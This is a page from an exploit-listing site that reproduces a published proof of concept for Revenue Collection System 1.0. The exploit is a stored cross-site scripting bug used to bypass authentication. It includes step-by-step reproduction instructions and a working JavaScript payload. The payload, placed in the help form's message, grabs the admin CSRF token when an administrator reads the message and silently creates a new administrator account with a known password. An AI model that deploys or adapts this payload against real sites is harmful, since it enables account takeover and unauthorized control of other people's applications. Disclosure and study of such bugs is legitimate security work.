Advertisement






Revenue Collection System 1.0 Cross Site Scripting / Authentication Bypass

CVE Category Price Severity
N/A CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-11-17
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022110027

Below is a copy:

Revenue Collection System 1.0 Cross Site Scripting / Authentication Bypass
# Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS
# Exploit Author: Joe Pollock
# Date: November 16, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip
# Tested on: Kali Linux, Apache, Mysql
# CVE: T.B.C
# Vendor: Kapiya
# Version: 1.0
# Exploit Description:
#   Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated 
#   client user to add an administrative user account to the application then log in as the newly created admin.

To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).
The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the
'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will 
be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should 
now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the
'target', 'x_Username', and 'x_Passsword' as required).

<script>
var target = "http://localhost/rates/admin/usersadd.php";
var req = new XMLHttpRequest();
req.open("GET", target);
req.send();
var parser = new DOMParser();
resp = req.responseText
var document = parser.parseFromString(resp, "text/html");
var token = document.getElementsByName("token")[0].value;
var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";
req.open("POST", target);
req.withCredentials = true;
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
</script>



















Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.